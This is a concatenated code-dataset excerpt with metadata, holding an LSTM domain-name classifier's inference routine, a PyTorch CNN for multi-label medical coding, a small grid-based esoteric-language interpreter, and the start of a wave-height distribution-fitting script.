train_model.save(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # train the model (which model is set by models input)\n # train_model.train(X_train, Y_train)\n # train_model.save(TOKENIZER_FILE, MODEL_JSON, MODEL_H5)\n # save the model to disk\n\n if inference_file != '':\n # an inference file was provided\n model_version = get_version_number(inference_file)\n print('inference file: {}'.format(inference_file))\n if model_type == 'binary':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_binary.LSTMBinary()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. 
Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n\n # write_to_train_logfile(metrics, logpath, True)\n elif model_type == 'multiclass':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_multiclass.LSTMMulti()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions, pred_prob = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n # predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # get test data\n # load the model (based on models input)\n # testmodel = lstm_binary.LSTMBinary()\n # testmodel.load(BINARY_TOKENIZER_FILE, BINARY_MODEL_JSON, BINARY_MODEL_H5)\n # make predictions\n # urllist = [\"www.google.com\", \"www.netflix.com\", \"plvklpgwivery.com\"]\n # urltypes = testmodel.predict(urllist)\n # print(\"URL type:\", urltypes)\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "code/models/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 26220, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 47, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 95, "usage_type": "call"}, {"api_name": "json.load", "line_number": 110, "usage_type": "call"}, {"api_name": "re.search", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 132, "usage_type": "call"}, {"api_name": 
"datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 175, "usage_type": "call"}, {"api_name": "time.time", "line_number": 180, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.factorize", "line_number": 239, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 248, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 248, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 255, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 311, "usage_type": "call"}, {"api_name": "os.path", "line_number": 311, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 440, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 440, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 458, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 458, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 459, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 522, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 522, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 523, "usage_type": "call"}, {"api_name": "time.time", "line_number": 524, "usage_type": "call"}, {"api_name": "time.time", "line_number": 526, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.time", "line_number": 546, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 547, "usage_type": "call"}, {"api_name": "time.time", "line_number": 549, "usage_type": 
"call"}, {"api_name": "time.strftime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 573, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 573, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 575, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.time", "line_number": 586, "usage_type": "call"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 594, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 594, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 598, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 608, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 608, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 610, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.time", "line_number": 622, "usage_type": "call"}, {"api_name": "time.time", "line_number": 624, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 630, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 630, "usage_type": "call"}]}
+{"seq_id": "577887414", "text": "import torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\ntorch.manual_seed(1)\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import f1_score\nimport copy\n\n##########################################################\n\nlabel_to_ix=np.load('label_to_ix.npy').item()\nix_to_label=np.load('ix_to_label.npy')\ntraining_data=np.load('training_data.npy')\ntest_data=np.load('test_data.npy')\nval_data=np.load('val_data.npy')\nword_to_ix=np.load('word_to_ix.npy').item()\nix_to_word=np.load('ix_to_word.npy')\nnewwikivec=np.load('newwikivec.npy')\nwikivoc=np.load('wikivoc.npy').item()\n\n\n\nwikisize=newwikivec.shape[0]\nrvocsize=newwikivec.shape[1]\nwikivec=autograd.Variable(torch.FloatTensor(newwikivec))\n\nbatchsize=32\n\n\n\ndef preprocessing(data):\n\n new_data=[]\n for i, note, j in data:\n templabel=[0.0]*len(label_to_ix)\n for jj in j:\n if jj in wikivoc:\n templabel[label_to_ix[jj]]=1.0\n templabel=np.array(templabel,dtype=float)\n new_data.append((i, note, templabel))\n new_data=np.array(new_data)\n \n lenlist=[]\n for i in new_data:\n lenlist.append(len(i[0]))\n sortlen=sorted(range(len(lenlist)), key=lambda k: lenlist[k]) \n new_data=new_data[sortlen]\n \n batch_data=[]\n \n for start_ix in range(0, len(new_data)-batchsize+1, batchsize):\n thisblock=new_data[start_ix:start_ix+batchsize]\n mybsize= len(thisblock)\n numword=np.max([len(ii[0]) for ii in thisblock])\n main_matrix = np.zeros((mybsize, numword), dtype= np.int)\n for i in range(main_matrix.shape[0]):\n for j in range(main_matrix.shape[1]):\n try:\n if thisblock[i][0][j] in word_to_ix:\n main_matrix[i,j] = word_to_ix[thisblock[i][0][j]]\n \n except IndexError:\n pass # because initialze with 0, so you pad with 0\n \n xxx2=[]\n yyy=[]\n for ii in thisblock:\n xxx2.append(ii[1])\n yyy.append(ii[2])\n \n xxx2=np.array(xxx2)\n yyy=np.array(yyy)\n batch_data.append((autograd.Variable(torch.from_numpy(main_matrix)),autograd.Variable(torch.FloatTensor(xxx2)),autograd.Variable(torch.FloatTensor(yyy))))\n return batch_data\nbatchtraining_data=preprocessing(training_data)\nbatchtest_data=preprocessing(test_data)\nbatchval_data=preprocessing(val_data)\n\n\n\n\n######################################################################\n# Create the model:\n\nEmbeddingsize=100\nhidden_dim=200\nclass CNN(nn.Module):\n\n def __init__(self, batch_size, vocab_size, tagset_size):\n super(CNN, self).__init__()\n self.hidden_dim = hidden_dim\n self.word_embeddings = nn.Embedding(vocab_size+1, Embeddingsize, padding_idx=0)\n self.embed_drop = nn.Dropout(p=0.2)\n \n self.hidden2tag = nn.Linear(300, tagset_size)\n \n \n self.convs1 = nn.Conv1d(Embeddingsize,100,3)\n self.convs2 = nn.Conv1d(Embeddingsize,100,4)\n self.convs3 = nn.Conv1d(Embeddingsize,100,5)\n \n \n self.layer2 = nn.Linear(Embeddingsize, 1,bias=False)\n self.embedding=nn.Linear(rvocsize,Embeddingsize)\n self.vattention=nn.Linear(Embeddingsize,Embeddingsize)\n \n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(0.2)\n \n def forward(self, vec1, nvec, wiki, simlearning):\n \n thisembeddings=self.word_embeddings(vec1)\n thisembeddings = self.embed_drop(thisembeddings)\n thisembeddings=thisembeddings.transpose(1,2)\n \n output1=self.tanh(self.convs1(thisembeddings))\n output1=nn.MaxPool1d(output1.size()[2])(output1)\n \n output2=self.tanh(self.convs2(thisembeddings))\n output2=nn.MaxPool1d(output2.size()[2])(output2)\n \n 
output3=self.tanh(self.convs3(thisembeddings))\n output3=nn.MaxPool1d(output3.size()[2])(output3)\n \n output4 = torch.cat([output1,output2,output3], 1).squeeze(2)\n \n if simlearning==1:\n nvec=nvec.view(batchsize,1,-1)\n nvec=nvec.expand(batchsize,wiki.size()[0],-1)\n wiki=wiki.view(1,wiki.size()[0],-1)\n wiki=wiki.expand(nvec.size()[0],wiki.size()[1],-1)\n new=wiki*nvec\n new=self.embedding(new)\n vattention=self.sigmoid(self.vattention(new))\n new=new*vattention\n vec3=self.layer2(new)\n vec3=vec3.view(batchsize,-1)\n \n \n vec2 = self.hidden2tag(output4)\n if simlearning==1:\n tag_scores = self.sigmoid(vec2.detach()+vec3)\n else:\n tag_scores = self.sigmoid(vec2)\n \n \n return tag_scores\n\n######################################################################\n# Train the model:\n\ntopk=10\n\ndef trainmodel(model, sim):\n print ('start_training')\n modelsaved=[]\n modelperform=[]\n topk=10\n \n \n bestresults=-1\n bestiter=-1\n for epoch in range(5000): \n model.train()\n \n lossestrain = []\n recall=[]\n for mysentence in batchtraining_data:\n model.zero_grad()\n \n targets = mysentence[2].cuda()\n tag_scores = model(mysentence[0].cuda(),mysentence[1].cuda(),wikivec.cuda(),sim)\n loss = loss_function(tag_scores, targets)\n loss.backward()\n optimizer.step()\n lossestrain.append(loss.data.mean())\n print (epoch)\n modelsaved.append(copy.deepcopy(model.state_dict()))\n print (\"XXXXXXXXXXXXXXXXXXXXXXXXXXXX\")\n model.eval()\n \n recall=[]\n for inputs in batchval_data:\n \n targets = inputs[2].cuda()\n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n \n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n for iii in range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n \n print ('validation top-',topk, np.mean(recall))\n \n \n \n modelperform.append(np.mean(recall))\n if modelperform[-1]>bestresults:\n bestresults=modelperform[-1]\n bestiter=len(modelperform)-1\n \n if (len(modelperform)-bestiter)>5:\n print (modelperform,bestiter)\n return modelsaved[bestiter]\n \nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\n\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\n\nbasemodel= trainmodel(model, 0)\ntorch.save(basemodel, 'CNN_model')\n\nmodel = CNN(batchsize, len(word_to_ix), len(label_to_ix))\nmodel.cuda()\nmodel.load_state_dict(basemodel)\nloss_function = nn.BCELoss()\noptimizer = optim.Adam(model.parameters())\nKSImodel= trainmodel(model, 1)\ntorch.save(KSImodel, 'KSI_CNN_model')\n\ndef testmodel(modelstate, sim):\n model = CNN(batchsize, len(word_to_ix), len(label_to_ix))\n model.cuda()\n model.load_state_dict(modelstate)\n loss_function = nn.BCELoss()\n model.eval()\n recall=[]\n lossestest = []\n \n y_true=[]\n y_scores=[]\n \n \n for inputs in batchtest_data:\n \n targets = inputs[2].cuda()\n \n tag_scores = model(inputs[0].cuda(),inputs[1].cuda() ,wikivec.cuda(),sim)\n\n loss = loss_function(tag_scores, targets)\n \n targets=targets.data.cpu().numpy()\n tag_scores= tag_scores.data.cpu().numpy()\n \n \n lossestest.append(loss.data.mean())\n y_true.append(targets)\n y_scores.append(tag_scores)\n \n for iii in 
range(0,len(tag_scores)):\n temp={}\n for iiii in range(0,len(tag_scores[iii])):\n temp[iiii]=tag_scores[iii][iiii]\n temp1=[(k, temp[k]) for k in sorted(temp, key=temp.get, reverse=True)]\n thistop=int(np.sum(targets[iii]))\n hit=0.0\n \n for ii in temp1[0:max(thistop,topk)]:\n if targets[iii][ii[0]]==1.0:\n hit=hit+1\n if thistop!=0:\n recall.append(hit/thistop)\n y_true=np.concatenate(y_true,axis=0)\n y_scores=np.concatenate(y_scores,axis=0)\n y_true=y_true.T\n y_scores=y_scores.T\n temptrue=[]\n tempscores=[]\n for col in range(0,len(y_true)):\n if np.sum(y_true[col])!=0:\n temptrue.append(y_true[col])\n tempscores.append(y_scores[col])\n temptrue=np.array(temptrue)\n tempscores=np.array(tempscores)\n y_true=temptrue.T\n y_scores=tempscores.T\n y_pred=(y_scores>0.5).astype(np.int)\n print ('test loss', np.mean(lossestest))\n print ('top-',topk, np.mean(recall))\n print ('macro AUC', roc_auc_score(y_true, y_scores,average='macro'))\n print ('micro AUC', roc_auc_score(y_true, y_scores,average='micro'))\n print ('macro F1', f1_score(y_true, y_pred, average='macro') )\n print ('micro F1', f1_score(y_true, y_pred, average='micro') )\n\nprint ('CNN alone: ')\ntestmodel(basemodel, 0)\nprint ('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\nprint ('KSI+CNN: ')\ntestmodel(KSImodel, 1)", "sub_path": "KSI_CNN.py", "file_name": "KSI_CNN.py", "file_ext": "py", "file_size_in_byte": 9837, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.manual_seed", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": 
"torch.nn.Dropout", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 128, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 227, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 296, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 298, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 299, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 300, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 301, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 302, "usage_type": "call"}]}
+{"seq_id": "308003631", "text": "from codeModule import *\nimport colorama, time, os, sys\nfrom colorama import Fore, Back, Style\n\nclass Stack:\n def __init__(self):\n self.stack = []\n\n def __str__(self):\n t = self.stack[::-1]\n out = \"___\"\n for i in t:\n out = \"{}\\n {} \".format(out, i)\n out = out + \"\\n\" + \"___\"\n return out\n\n def pop(self):\n if self.stack:\n return self.stack.pop()\n else:\n return 0\n\n def push(self, val):\n self.stack.append(val)\n\n\ndef cont(v, a, b):\n if v < a:\n return b\n if v > b:\n return a\n return v\n\n\nclass Pointer:\n def __init__(self, diagram):\n self.UP = 0\n self.RIGHT = 1\n self.DOWN = 2\n self.LEFT = 3\n\n self.diagram = diagram\n self.maxX = self.diagram.calcMaxX()\n self.maxY = len(self.diagram.code)\n self.x = 0\n self.y = 0\n self.dir = self.RIGHT\n\n def forward(self):\n if self.dir == self.UP:\n self.y = cont(self.y - 1, 0, self.maxY-1)\n elif self.dir == self.DOWN:\n self.y = cont(self.y + 1, 0, self.maxY-1)\n elif self.dir == self.RIGHT:\n self.x = cont(self.x + 1, 0, self.maxX-1)\n elif self.dir == self.LEFT:\n self.x = cont(self.x - 1, 0, self.maxX-1)\n\n def turnRight(self):\n self.dir = cont(self.dir + 1, self.UP, self.LEFT)\n\n def turnLeft(self):\n self.dir = cont(self.dir - 1, self.UP, self.LEFT)\n\n\nclass Diagram:\n def __init__(self, code=\"\", verbose=False):\n if code:\n self.code = code\n else:\n self.getCode()\n self.stack = Stack()\n self.pointer = Pointer(self)\n self.v = verbose\n if self.v:\n colorama.init()\n\n def getCode(self):\n if len(sys.argv) == 2:\n fName = sys.argv[1]\n else:\n fName = input(\"File Name: \")\n print()\n with open(fName, \"r\") as file:\n data = file.read().split(\"\\n\")\n del data[-1]\n #print(data)\n for i in range(len(data)):\n data[i] = list(data[i])\n #print(data)\n self.code = data\n mx = self.calcMaxX()\n for i in self.code:\n for t in range(mx - len(i)):\n i.append(' ')\n\n def calcMaxX(self):\n lst = list(map(lambda x: len(x), self.code))\n return max(lst)\n\n def run(self):\n while True:\n if self.v:\n if os.name == \"nt\":\n os.system('cls')\n elif os.name == \"posix\":\n os.system('clear')\n for y in range(len(self.code)):\n for x in range(len(self.code[y])):\n #print(\"{}\".format(Style.RESET_ALL), end=\"\")\n style = \"\"\n if x == self.pointer.x and y == self.pointer.y:\n style = Back.RED\n print(\"{}{}\".format(style, self.code[y][x]), end=\"\")\n print(\"{}\".format(Style.RESET_ALL), end=\"\")\n print()\n time.sleep(0.1)\n #print()\n exec(codes[self.code[self.pointer.y][self.pointer.x]])\n self.pointer.forward()\n\n\nif __name__ == \"__main__\":\n d = Diagram(verbose=False)\n d.run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 79, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 105, "usage_type": "call"}, {"api_name": "os.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 107, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 113, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 113, "usage_type": "name"}, {"api_name": 
"colorama.Style.RESET_ALL", "line_number": 115, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 115, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "517749613", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 3 13:59:12 2020\n\n@author: astah\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import norm, weibull_min, chi2, lognorm, kstest\nfrom scipy.optimize import curve_fit\nfrom read_write import determine_file_name_e1, write_contour, read_contour\nfrom contour_statistics import points_outside\nfrom plot import PlottedSample, plot_contour\nfrom read_write import read_dataset\nplt.close('all')\n\nplt.close('all')\n#%% Functions to fit\n# Power function\ndef power3(x, a, b, c):\n return a + b * x ** c\n\n# Exponential function\ndef exp3(x, a, b, c):\n return a + b * np.exp(c * x)\n\n#%% Read dataset A, B or C.\nDATASET_CHAR = 'A'\nfile_path = '../datasets/' + DATASET_CHAR + '.txt'\nsample_hs, sample_tz, label_hs, label_tz= read_dataset(file_path)\n\ndf = pd.read_csv(file_path, sep='; ')\n#%% Inspect the marginal distributions\n\nweib_par1 = weibull_min.fit(df[df.columns[1]], loc=0)\nlogn_par1 = lognorm.fit(df[df.columns[1]], loc=0)\n\nweib_par2 = weibull_min.fit(df[df.columns[2]], loc=0)\nlogn_par2 = lognorm.fit(df[df.columns[2]], loc=0)\n\n#%% Goodness of fit\n\nprint(kstest(df[df.columns[1]].values, 'weibull_min', args=weib_par1)) \nprint(kstest(df[df.columns[1]].values, 'lognorm', args=logn_par1))\n\nprint(kstest(df[df.columns[2]].values, 'weibull_min', args=weib_par2))\nprint(kstest(df[df.columns[2]].values, 'lognorm', args=logn_par2))\n\n#%% Plot the distributions\n#n_bins = 100\n\n#plt.figure()\n#plt.subplot(211)\n#n1, bins1, _ = plt.hist(df[df.columns[1]], n_bins, density=True, label = df.columns[1])\n#plt.plot(bins1, weibull_min.pdf(bins1,*weib_par1), label='Weibull')\n#plt.plot(bins1, lognorm.pdf(bins1,*logn_par1), label='Lognorm')\n#plt.legend(loc='best')\n#plt.subplot(212)\n#n, bins, _ = plt.hist(df[df.columns[2]], n_bins, density=True, label = 